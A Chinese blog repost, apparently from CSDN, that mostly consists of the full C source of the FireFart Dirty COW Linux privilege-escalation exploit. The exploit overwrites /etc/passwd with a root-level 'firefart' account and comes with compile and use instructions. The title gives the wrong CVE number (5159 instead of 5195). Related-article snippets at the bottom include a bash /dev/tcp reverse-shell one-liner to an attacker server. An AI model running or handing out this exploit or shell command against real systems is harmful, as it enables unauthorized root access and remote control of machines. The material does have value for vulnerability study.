linux系统漏洞firefart,CVE-2016-5159 利用脏牛漏洞Linux提权复现

最新推荐文章于 2022-07-12 11:33:10 发布
最新推荐文章于 2022-07-12 11:33:10 发布
阅读量247 收藏
点赞数
文章标签: linux系统漏洞firefart

//

//This exploit uses the pokemon exploit of the dirtycow vulnerability//as a base and automatically generates a new passwd line.//The user will be prompted for the new password when the binary is run.//The original /etc/passwd file is then backed up to /tmp/passwd.bak//and overwrites the root account with the generated line.//After running the exploit you should be able to login with the newly//created user.//

//To use this exploit modify the user values according to your needs.//The default is "firefart".//

//Original exploit (dirtycow's ptrace_pokedata "pokemon" method):// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

//

//Compile with://gcc -pthread dirty.c -o dirty -lcrypt//

//Then run the newly create binary by either doing://"./dirty" or "./dirty my-new-password"//

//Afterwards, you can either "su firefart" or "ssh firefart@..."//

//DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!//mv /tmp/passwd.bak /etc/passwd//

//Exploit adopted by Christian "FireFart" Mehlmauer// https://firefart.at

//#include#include#include#include#include#include#include#include#include#include#include#include#include

const char *filename = "/etc/passwd";const char *backup_filename = "/tmp/passwd.bak";const char *salt = "firefart";intf;void *map;

pid_t pid;

pthread_t pth;structstat st;structUserinfo {char *username;char *hash;intuser_id;intgroup_id;char *info;char *home_dir;char *shell;

};char *generate_password_hash(char *plaintext_pw) {returncrypt(plaintext_pw, salt);

}char *generate_passwd_line(structUserinfo u) {const char *format = "%s:%s:%d:%d:%s:%s:%s\n";int size = snprintf(NULL, 0, format, u.username, u.hash,

u.user_id, u.group_id, u.info, u.home_dir, u.shell);char *ret = malloc(size + 1);

sprintf(ret, format, u.username, u.hash, u.user_id,

u.group_id, u.info, u.home_dir, u.shell);returnret;

}void *madviseThread(void *arg) {int i, c = 0;for(i = 0; i < 200000000; i++) {

c+= madvise(map, 100, MADV_DONTNEED);

}

printf("madvise %d\n\n", c);

}int copy_file(const char *from, const char *to) {//check if target file already exists

if(access(to, F_OK) != -1) {

printf("File %s already exists! Please delete it and run again\n",

to);return -1;

}charch;

FILE*source, *target;

source= fopen(from, "r");if(source ==NULL) {return -1;

}

target= fopen(to, "w");if(target ==NULL) {

fclose(source);return -1;

}while((ch = fgetc(source)) !=EOF) {

fputc(ch, target);

}

printf("%s successfully backed up to %s\n",from, to);

fclose(source);

fclose(target);return 0;

}int main(int argc, char *argv[])

{//backup file

int ret =copy_file(filename, backup_filename);if (ret != 0) {

exit(ret);

}structUserinfo user;//set values, change as needed

user.username = "firefart";

user.user_id= 0;

user.group_id= 0;

user.info= "pwned";

user.home_dir= "/root";

user.shell= "/bin/bash";char *plaintext_pw;if (argc >= 2) {

plaintext_pw= argv[1];

printf("Please enter the new password: %s\n", plaintext_pw);

}else{

plaintext_pw= getpass("Please enter the new password:");

}

user.hash=generate_password_hash(plaintext_pw);char *complete_passwd_line =generate_passwd_line(user);

printf("Complete line:\n%s\n", complete_passwd_line);

f=open(filename, O_RDONLY);

fstat(f,&st);

map=mmap(NULL,

st.st_size+ sizeof(long),

PROT_READ,

MAP_PRIVATE,

f,0);

printf("mmap: %lx\n",(unsigned long)map);

pid=fork();if(pid) {

waitpid(pid, NULL,0);int u, i, o, c = 0;int l=strlen(complete_passwd_line);for(i = 0; i < 10000/l; i++) {for(o = 0; o < l; o++) {for(u = 0; u < 10000; u++) {

c+=ptrace(PTRACE_POKETEXT,

pid,

map+o,*((long*)(complete_passwd_line +o)));

}

}

}

printf("ptrace %d\n",c);

}else{

pthread_create(&pth,

NULL,

madviseThread,

NULL);

ptrace(PTRACE_TRACEME);

kill(getpid(), SIGSTOP);

pthread_join(pth,NULL);

}

printf("Done! Check %s to see if the new user was created.\n", filename);

printf("You can log in with the username '%s' and the password '%s'.\n\n",

user.username, plaintext_pw);

printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",

backup_filename, filename);return 0;

}

Rhokois Phisolis
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
脏牛提权漏洞复现CVE-2016-5159
1匹黑马
02-22 1449
文章目录影响范围危害漏洞原理漏洞利用 影响范围 Linux kernel >= 2.6.22(2007年发行,到2016年10月18日前所有发行版本) 危害 普通权限用户执行编译后的exp直接提权成root用户 漏洞原理 get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区...
Linux脏牛提权漏洞复现CVE-2016-5195)
小千安全
05-06 625
脏牛漏洞是一个严重的漏洞,可以允许攻击者获得管理员权限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
dirtycow脏牛linux提权exp
03-25
dirtycow脏牛linux提权exp
str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞
weixin_39636610的博客
05-16 270
本文主要向大家介Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞绍了,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。CVE-2016-5195Dirtycow:Linux内核提权漏洞以下都是github上找的源码,然后在ubuntu-12.04.5-desktop-i386上实验成功首先运行下面的确定漏洞:/*##########...
CVE-2016-5159 利用脏牛漏洞Linux提权复现
weixin_30641999的博客
04-29 711
当前路径:/var/www 磁盘列表:/ 系统信息:Linuxzico3.2.0-23-generic#36-UbuntuSMPTueApr1020:39:51UTC2012x86_64 当前用户:www-data 执行exp c 文件 影响版本低于3.9的linux内核 // // This exploit uses the pok...
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1157
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Linux脏牛(DirtyCow-CVE-2016-5195)本地提权漏洞复现
锋刃科技的博客
11-27 794
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用漏洞获取权限。 影响版本 从 2007 年发布 2.6.22 版本开始,直到2016年10月18日为止,这中间发行的所有 Linux 系统都受影响 漏洞复现 当前用户为te
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现CVE-2016-5195)复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
linux系统漏洞firefart,记:从文件上传漏洞到获得root权限
weixin_33511258的博客
05-16 795
提权过程试了好几种方法。使用反向连接得到webshell,得到内核版本等信息#公网服务器使用nc监听nc -lvvp 1234#目标机器上执行命令bash -i >& /dev/tcp/公网服务器IP/端口 0>&1[www@centos]$ whoamiwww[www@centos]$ uname -auname -aLinux centos 2.6.32-431.e...
脏牛提权复现CVE-2016-5159
qq_40671478的博客
09-02 1680
脏牛提权CVE-2016-5159漏洞原理: 该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。当我们向带有MAP_PRIVATE标记的只读文件映射区域写数据时,会产生一个映射文件的复制(COW),对此区域的任何修改都不会写回原来的文件,如果上述的竞态条件发生,就能成功的写回原来的文件。比如我们修改su或者passwd程序就可以达到提权root的目的。
脏牛提权cve-2016-5159
热门推荐
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用漏洞来获取高权限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...
9.CVE-2016-5195(脏牛)内核提权漏洞分析
weixin_30455365的博客
08-26 732
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
mysql 注入 提权_记一次安全测试从sql注入到getshell到root提权
weixin_27207591的博客
01-19 354
//// This exploit uses the pokemon exploit of the dirtycow vulnerability// as a base and automatically generates a new passwd line.// The user will be prompted for the new password when the binary is ...
记一次内网渗透测试实训总结
qq_36410265的博客
06-20 3789
时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗透也还是头一次,得益于这次的内网渗透靶场环境,小小地体验了一下,期间也踩了许多坑,也陆陆续续地解决掉了。所以就以本篇文章做个总结,目的在于梳理所学到地知识点和分享。物理机 (win 10) ip:172.20.10.1工具:、攻击机(kali) ip:172.20.10.129工具:、、、、、 …靶场拓扑图首先需要拿到...
国内移动端APP月活跃(MAU)Top5000 数据整理
最新发布
06-16
国内移动端APP月活跃(MAU)Top5000 时间范围:2020年-2022年 具有一定参考价值 csv格式
Linux提权脏牛漏洞(CVE-2016-5195)复现
07-28
对于Linux提权脏牛漏洞CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值